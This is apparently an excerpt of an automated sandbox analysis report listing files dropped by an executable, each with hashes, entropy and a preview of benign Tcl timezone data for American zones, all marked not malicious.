                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2912
                                                                                                                                                                                                                              Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                              MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                              SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                              SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                              SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                              MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                              SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                              SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                              SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1128
                                                                                                                                                                                                                              Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                              MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                              SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                              SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                              SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2967
                                                                                                                                                                                                                              Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                              SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                              SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                              SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                              MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                              SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                              SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                              SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8920
                                                                                                                                                                                                                              Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                              SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                              SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                              SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8430
                                                                                                                                                                                                                              Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                              SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                              SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                              SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                              MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                              SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                              SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                              SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8600
                                                                                                                                                                                                                              Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                              SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                              SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                              SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                                              Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                              MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                              SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                              SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                              SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Eirunepe) {.. {-9223372036854775808 -16768 0 LMT}.. {-1767208832 -18000 0 -05}.. {-1206950400 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1175367600 -14400 1 -05}.. {-1159819200 -18000 0 -05}.. {-633812400 -14400 1 -05}.. {-622062000 -18000 0 -05}.. {-602276400 -14400 1 -05}.. {-591825600 -18000 0 -05}.. {-570740400 -14400 1 -05}.. {-560203200 -18000 0 -05}.. {-539118000 -14400 1 -05}.. {-531345600 -18000 0 -05}.. {-191358000 -14400 1 -05}.. {-184190400 -18000 0 -05}.. {-155156400 -14400 1 -05}.. {-150062400 -18000 0 -05}.. {-128890800 -14400 1 -05}.. {-121118400 -18000 0 -05}.. {-99946800 -14400 1 -05}.. {-89582400 -18000 0 -05}.. {-68410800 -14400 1 -05}.. {-57960000 -18000 0 -05}.. {499755600 -14400 1 -05}.. {511243200 -18000 0 -05}.. {530600400 -14400 1 -05}.. {540273600 -18000 0 -05}.. {562136400 -14400 1 -05}.. {571204800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):279
                                                                                                                                                                                                                              Entropy (8bit):4.760311149376001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/29078iPDm2OHvJ4YoHxHhgdrV/uF+IcmJ3/uF+ivNv:MB8629078AmdHx4YCJSB/uF+QV/uF+w9
                                                                                                                                                                                                                              MD5:CEF7277443EB6990E72C7EA7F79A122C
                                                                                                                                                                                                                              SHA1:1D3FEA364B3DC129DE3998A1455D5588EBAA6FF8
                                                                                                                                                                                                                              SHA-256:C02C6E79398553BD07BEA0BE4B7F0EBDD8BC821595909CFFB49DE4290A0D1D0F
                                                                                                                                                                                                                              SHA-512:E6FC530B2CCF010B8D38BC3F49A6859B5C68F4AB604E6305CE75FBE4FC9FF3FCD0187DEBEF6DAE652EEF9695568DBDE31F426E404CC3CC206D78183E0D919234
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/El_Salvador) {.. {-9223372036854775808 -21408 0 LMT}.. {-1546279392 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.836337676384058
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qfSfXHAIg20qfORL/2IAcGE7JM7QIAcGEqfBn:SlSWB9vsM3y7ekHAIgpeON/2907390eB
                                                                                                                                                                                                                              MD5:005D9C0E50291616A727CFB74A9FD37E
                                                                                                                                                                                                                              SHA1:846AE6720382B4F67B37B4256E45246C81DAF899
                                                                                                                                                                                                                              SHA-256:3E363BF82545F24CCE8CFA6EEC97BA6E1C2A7730B2A9CE6C48F784821D308A5D
                                                                                                                                                                                                                              SHA-512:452326D11D01825764BC40A77D17444D822F3AA202582233DD8B122798478FA83E3A27A02508EAC4CF0C7922AC2563742D773AA870562AE496B34FBB41FBAD63
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Ensenada) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4578
                                                                                                                                                                                                                              Entropy (8bit):3.8944281193962818
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5QIgsB/YRRvkGZ+R64CjSUlTG5Al5pj/A1ZFCARCeQbvb5+:6IgzR864CjSETG5sjgZkR/bvt+
                                                                                                                                                                                                                              MD5:4A4E023F635C4202018EA9E8F85B5047
                                                                                                                                                                                                                              SHA1:38E121FE2D419413E9E791B6C22BFC8D9F7554BC
                                                                                                                                                                                                                              SHA-256:AB15023807E7C7D1026C9970D190F1B405D48952464025242C2BB6C6BBB8391A
                                                                                                                                                                                                                              SHA-512:F10D21A2C841224879D1C817FC7F477DF582E1BC3603666B55199C098D51D1D5429F8C088C1083C07FC7588AE5C42A1DFBCC6B7C636AD1BE84ED657807A229E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Fort_Nelson) {.. {-9223372036854775808 -29447 0 LMT}.. {-2713880953 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):231
                                                                                                                                                                                                                              Entropy (8bit):4.778858143786314
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y73GK7JHAIgp3GKZRN/290HXYAp4903GK8:MByMY3GK7Kp3GKnt290Hz4903GK8
                                                                                                                                                                                                                              MD5:24C369A3091452DCA7AAEBF4F48F5289
                                                                                                                                                                                                                              SHA1:2C2174CB16F490689E6FAC17B6D18F4A0DBD2DC9
                                                                                                                                                                                                                              SHA-256:C8948616262CF6990739343ABBBD237E572DB49310099E21DD8F9E317F7D11B3
                                                                                                                                                                                                                              SHA-512:80F579572754579706B4EEA49BF30456F3231A308E0616DC430E2428A04992412773421542E4F7FE4E4C7491BA88942FA44B49E87E95A2183211AC2AB523B231
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indiana/Indianapolis)]} {.. LoadTimeZoneFile America/Indiana/Indianapolis..}..set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1423
                                                                                                                                                                                                                              Entropy (8bit):3.784027854102512
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5MeajcChlrLPsw6kSS3h5R14eH8tf3GvIkuoYVZaIBXR8nd:5rChlvEw6kSSx5H4a8tf3fkuoYVZDNRo
                                                                                                                                                                                                                              MD5:E7939C9A3F83D73B82A6DE359365EFD4
                                                                                                                                                                                                                              SHA1:06D6E257DA7C317CAFAF6C0B04567A2453CC1660
                                                                                                                                                                                                                              SHA-256:C0A836BDAF07F0376B7B0833A0AB3D52BA6E3E1D6F95E247E1AD351CD1096066
                                                                                                                                                                                                                              SHA-512:E2BEA04084489B26ADD9A768D2580C1FF7EBAC8A3EA36818F49E85FB14E01500D59D53904F5A17F4DABEF27B4CC2FC3F977EE4C125E5CE739BBE90C130ED3B07
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
